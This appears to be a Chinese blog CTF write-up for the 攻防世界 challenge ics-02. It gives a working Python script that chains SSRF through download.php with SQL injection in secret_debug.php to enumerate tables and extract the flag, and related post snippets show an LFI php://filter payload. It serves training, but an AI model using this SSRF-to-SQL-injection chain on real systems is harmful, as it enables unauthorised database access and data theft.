[wp] 攻防世界 ics-02

最新推荐文章于 2025-02-26 13:57:51 发布
最新推荐文章于 2025-02-26 13:57:51 发布
阅读量2.9k 收藏 1
点赞数
分类专栏: 网安 文章标签: ssrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40884727/article/details/101717581
版权
本文详细记录了一次利用SSRF(服务器端请求伪造)漏洞进行渗透测试的过程,通过构造恶意请求,成功触发了目标服务器上的SQL注入漏洞,最终获取到了敏感信息。文章展示了具体的攻击思路、测试代码和防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

进去扫目录发现/secret
在这里插入图片描述
无法直接进入secret_debug.php 显示ip不对
点paper会向download.php传参,可以下载一个ssrf内容的pdf,
于是想到利用ssrf来访问secret_debug.php
在这里插入图片描述
发现参数s,fuzz一下,发现s=3时会有如下返回
在这里插入图片描述
经测试在此页面发现sql注入漏洞,进行注入得到flag,脚本如下:

import requests
import random
import urllib

url = 'http://111.198.29.45:52536/download.php'

# subquery = "database()"
# ssrfw
# subquery = "select table_name from information_schema.tables where table_schema='ssrfw' LIMIT 1"
# cetcYssrf
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1"
# secretname -> flag
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1, 1"
# value -> flag{cpg9ssnu_OOOOe333eetc_2018}
subquery = "select value from cetcYssrf LIMIT 1"

id = random.randint(1, 10000000)

d = ('http://127.0.0.1/secret/secret_debug.php?' +
        urllib.parse.urlencode({
            "s": "3",
            "txtfirst_name": "L','1',("+subquery+"),'1'/*",
            "txtmiddle_name": "m",
            "txtLast_name": "y",
            "txtname_suffix": "Esq.",
            "txtdob": "*/,'01/10/2019",
            "txtdl_nmbr": id,
            "txtRetypeDL": id
            }) + "&")


r = requests.get(url, params={"dl": d})
print(r.text)
【网络安全 | CTF】攻防世界 ics-06 解题详析
等风来
05-20 5962
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,留下了入侵者的痕迹。仅栏能打开新窗口:注意到URL栏的id参数,对id进行爆破。
[wp] 攻防世界 ics-05
MercyLin的博客
09-06 1328
进入题目发现也只有设备维护中心的选项可以点 page传的参数在页面会有回显,fuzz一下:
攻防世界 WEB ics-02
qq_41696858的博客
10-01 293
考的是sql注入,结合之前的ics系列,肯定要从唯一有用的a链接入手,发现文档中心可以进入,点进去,又发现一个a链接 <a href="download.php?dl=ssrf">paper. </a> 下下来download.php,打开可以发现pdf之类的头,那么就是个pdf,结合ssrf的提示,后面可能会有用 然后扫一波目录,发现/secrets目录 发现里面有secret_debug.php和secret.php两个文件,其中debug文件不能直接访问,那么ssrf大概就
攻防世界--ics-02
qq_46263951的博客
01-06 1089
初始页面,看到这种页面就比较头疼,无从下手 先来扫下目录 download会让我们下载一个ssrf的pdf文件 secret目录下包含着secret.php和secret_debug.php login页面显示
攻防世界-----ssrf me
最新发布
2301_76872222的博客
02-26 457
攻防世界--ssrf me 本地访问 python脚本编写
攻防世界web高手进阶之ics-02
花城的博客
09-23 377
攻防世界web高手进阶之ics-02结束语 进入文档中心页面,点击paper可以下载pdf文件,请求download.php,参数为dl pdf文件内容为ssrf,可能为线索 接着扫一遍目录,发现了/secret目录 访问一下试试 分别访问 看到私密页面1,查看元素,填完表提交,到达私密页面2,元素有一个变量s,s=3时返回页面2 发现secret_debug.php无法访问 到这里就无头绪了,wp大法,利用download.php传参进行ssrf攻击 虽然只能下载pdf文件,但是下载一个不存在
【愚公系列】2023年06月 攻防世界-Web(ics-02
时光隧道
06-21 7029
SSRF(服务器端请求伪造)是一种攻击技术,攻击者通过构造恶意请求,欺骗服务器发起外部请求,获取服务器本应该不被直接访问的信息或服务。攻击者可利用 SSRF 进行一系列攻击,包括对内部资源进行扫描、窃取敏感信息、攻击内部系统等。SQL 注入是一种常见的 Web 攻击技术,攻击者通过在输入框等用户交互界面中注入 SQL 代码,进而控制数据库操作,例如读取、修改、删除等。攻击者可通过 SQL 注入进行窃取敏感信息、篡改数据,或直接攻击数据库服务器等。
攻防世界 web高手进阶区 8分题 ics-02
闵行小鱼塘
10-04 655
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是ics-02的writeup
攻防世界ics-5wp
T19er的博客
07-10 3025
0x01 ics-5 浏览只有一个index页面,想到down源码,无果。 查看源代码发现有个page参数可以传值,利用LFI来查看源码。 /index.php?page=php://filter/read=convert.base64-encode/resource=index.php 读到base64加密的源码 PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNl...
攻防世界-ics-05-WP
xiaoduanDDG的博客
04-16 348
进入题目,找到这个页面 在url中没有变化,右键查看源码 进入这个页面 /index.php?page=index 看到page,可能存在文件包含漏洞 补充知识点: LFI漏洞的黑盒判断方法: 单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞 利用文件包含漏洞,有一个直接读取源代码的方法...
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4659
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
xctf ics-02
weixin_51861515的博客
11-07 344
访问网址,打开文档中心,查看源代码。 发现 secure/default.php(没啥用) 和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。(浏览器的自解码机制,a标签的href属性会进行URL解码)。 打开看一下 没啥有用的信息。 可以用的信息太少了,dirsearch扫一下。 访问secret/ secret.php是一个注册页面,secret_deb...
ics-02攻防世界 CTF
wuyaowangchuan的博客
11-30 597
进入环境 扫后台目录 发现/secret和一个index.php 访问index.php 点击paper之后下载文档 这个文档双击打不开 shell命令:xxd命令 用xxd打开 xxd download.php 但是在终端直接显示的话太多了,翻不到上面的 所以我就把他重定向到txt文件里面查看 第一行里面就说了这是一个pdf 打开之后这个文档说的是SSRF,猜测这个题目可能用到SSRF 回头看了一眼 paper的url是/download.php?dl=ssrf 接着再去访问secret.
ICS-02
weixin_52921802的博客
11-16 402
数字逻辑 一、MOS晶体管 三个引脚(电极),分别被称作“栅级”、“源级”,“漏极”。 标识方法 横线代表正极 下三角代表接地 n-MOS晶体管 如果在栅极接入2.9V电压,则在源极和漏极之间会产生一条通路,这时候n-MOS晶体管就等于是一根连通线(“闭路”)。如果栅极电压是0V,则源极和漏极之间断开,此时称为“开路” p-MOS晶体管 与n-MOS晶体管工作方式恰恰相反 CM..
CTF-02
渗透笔记
01-18 580
题目说明:seelog 1.打开链接后,就几个黑字:本站是内部网站,非请勿入 2.纯静态页面,源码也无注释提示,对其进行目录扫描,发现存在一个log目录,访问之 3.访问后发现该目录下有两个日志文件,根据题目说明,开始审查日志文件 4.错误日志文件没有有用信息,在访问日志中寻找线索 访问日志中有请求链接,服务器返回状态等有用信息,通过搜索200状态码来查看哪些链接访问成功
Web安全攻防世界09 ics-07(XCTF)
weixin_42789937的博客
01-29 1306
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
【愚公系列】2023年06月 攻防世界-Web(ics-07)
时光隧道
06-15 4323
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
攻防世界----ics-07
qq_44418229的博客
07-26 512
攻防世界---ics-07 分析源码+正则
攻防世界WEB】难度五星15分进阶题:ics-07
07-24 662
攻防世界WEB】五星15分
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值